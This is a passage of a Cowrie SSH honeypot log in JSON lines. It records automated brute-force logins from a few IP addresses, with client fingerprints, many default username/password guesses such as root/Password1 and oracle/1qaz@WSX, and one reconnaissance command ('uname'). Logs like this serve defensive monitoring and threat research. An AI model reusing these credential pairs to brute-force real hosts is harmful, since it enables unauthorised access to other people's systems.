03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.798601Z","src_ip":"212.227.235.229","session":"67811714da92"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:12.317492Z","src_ip":"212.227.125.160","session":"28784cdc46c4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:01:12.318526Z","src_ip":"212.227.125.160","session":"28784cdc46c4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:12.759265Z","src_ip":"212.227.235.229","session":"67811714da92"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:12.846487Z","src_ip":"212.227.125.160","session":"2c4ad81d86a5"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:13.000874Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:13.005973Z","src_ip":"212.227.235.229","session":"67811714da92"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password","message":"login attempt [debian/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:16.356854Z","src_ip":"212.227.125.160","session":"28784cdc46c4"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:18.116302Z","src_ip":"212.227.125.160","session":"28784cdc46c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42090,"dst_ip":"1.2.3.4","dst_port":22,"session":"db290e0352fb","protocol":"ssh","message":"New connection: 212.227.125.160:42090 (1.2.3.4:22) [session: db290e0352fb]","sensor":"my-vps","timestamp":"2025-08-31T01:01:21.855990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:21.857030Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:21.930834Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:22.167518Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:22.496427Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:01:22.497168Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:22.572110Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:22.573251Z","src_ip":"212.227.125.160","session":"db290e0352fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49990,"dst_ip":"1.2.3.4","dst_port":22,"session":"0762753e609d","protocol":"ssh","message":"New connection: 217.72.205.35:49990 (1.2.3.4:22) [session: 0762753e609d]","sensor":"my-vps","timestamp":"2025-08-31T01:01:24.800473Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:24.801568Z","src_ip":"217.72.205.35","session":"0762753e609d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46156,"dst_ip":"1.2.3.4","dst_port":22,"session":"663b8465af0b","protocol":"ssh","message":"New connection: 212.227.125.160:46156 (1.2.3.4:22) [session: 663b8465af0b]","sensor":"my-vps","timestamp":"2025-08-31T01:01:32.193385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:32.194787Z","src_ip":"212.227.125.160","session":"663b8465af0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:32.269457Z","src_ip":"212.227.125.160","session":"663b8465af0b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:32.500996Z","src_ip":"212.227.125.160","session":"663b8465af0b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:33.667226Z","src_ip":"212.227.125.160","session":"663b8465af0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53942,"dst_ip":"1.2.3.4","dst_port":22,"session":"557ab6ec198d","protocol":"ssh","message":"New connection: 212.227.125.160:53942 (1.2.3.4:22) [session: 557ab6ec198d]","sensor":"my-vps","timestamp":"2025-08-31T01:01:42.596065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:42.596953Z","src_ip":"212.227.125.160","session":"557ab6ec198d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:42.670733Z","src_ip":"212.227.125.160","session":"557ab6ec198d"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:42.900372Z","src_ip":"212.227.125.160","session":"557ab6ec198d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:44.068258Z","src_ip":"212.227.125.160","session":"557ab6ec198d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40748,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bd28e591615","protocol":"ssh","message":"New connection: 212.227.125.160:40748 (1.2.3.4:22) [session: 3bd28e591615]","sensor":"my-vps","timestamp":"2025-08-31T01:01:53.035050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:53.035977Z","src_ip":"212.227.125.160","session":"3bd28e591615"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:53.109961Z","src_ip":"212.227.125.160","session":"3bd28e591615"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:53.380851Z","src_ip":"212.227.125.160","session":"3bd28e591615"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:54.530790Z","src_ip":"212.227.125.160","session":"3bd28e591615"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46682,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccada85990a0","protocol":"ssh","message":"New connection: 212.227.235.229:46682 (1.2.3.4:22) [session: ccada85990a0]","sensor":"my-vps","timestamp":"2025-08-31T01:01:55.107161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:57.416095Z","src_ip":"212.227.235.229","session":"ccada85990a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:01:57.416804Z","src_ip":"212.227.235.229","session":"ccada85990a0"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password1","message":"login attempt [debian/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:01.111626Z","src_ip":"212.227.235.229","session":"ccada85990a0"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:02.592210Z","src_ip":"212.227.235.229","session":"ccada85990a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35338,"dst_ip":"1.2.3.4","dst_port":22,"session":"104654d6485d","protocol":"ssh","message":"New connection: 212.227.125.160:35338 (1.2.3.4:22) [session: 104654d6485d]","sensor":"my-vps","timestamp":"2025-08-31T01:02:03.428084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:03.428885Z","src_ip":"212.227.125.160","session":"104654d6485d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:03.501878Z","src_ip":"212.227.125.160","session":"104654d6485d"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:03.733239Z","src_ip":"212.227.125.160","session":"104654d6485d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:04.870845Z","src_ip":"212.227.125.160","session":"104654d6485d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33318,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c387f1c042d","protocol":"ssh","message":"New connection: 212.227.125.160:33318 (1.2.3.4:22) [session: 0c387f1c042d]","sensor":"my-vps","timestamp":"2025-08-31T01:02:06.198681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:07.122118Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:07.123054Z","src_ip":"212.227.125.160","session":"0c387f1c042d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46950,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd070e72a871","protocol":"ssh","message":"New connection: 212.227.235.229:46950 (1.2.3.4:22) [session: dd070e72a871]","sensor":"my-vps","timestamp":"2025-08-31T01:02:08.783908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:02:08.784623Z","src_ip":"212.227.235.229","session":"dd070e72a871"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:02:08.852385Z","src_ip":"212.227.235.229","session":"dd070e72a871"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"!QAZ@WSX","message":"login attempt [ftpuser/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T01:02:09.162319Z","src_ip":"212.227.235.229","session":"dd070e72a871"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:10.232157Z","src_ip":"212.227.235.229","session":"dd070e72a871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48800,"dst_ip":"1.2.3.4","dst_port":22,"session":"00a4cd82f924","protocol":"ssh","message":"New connection: 212.227.235.229:48800 (1.2.3.4:22) [session: 00a4cd82f924]","sensor":"my-vps","timestamp":"2025-08-31T01:02:11.445744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:02:11.446757Z","src_ip":"212.227.235.229","session":"00a4cd82f924"}
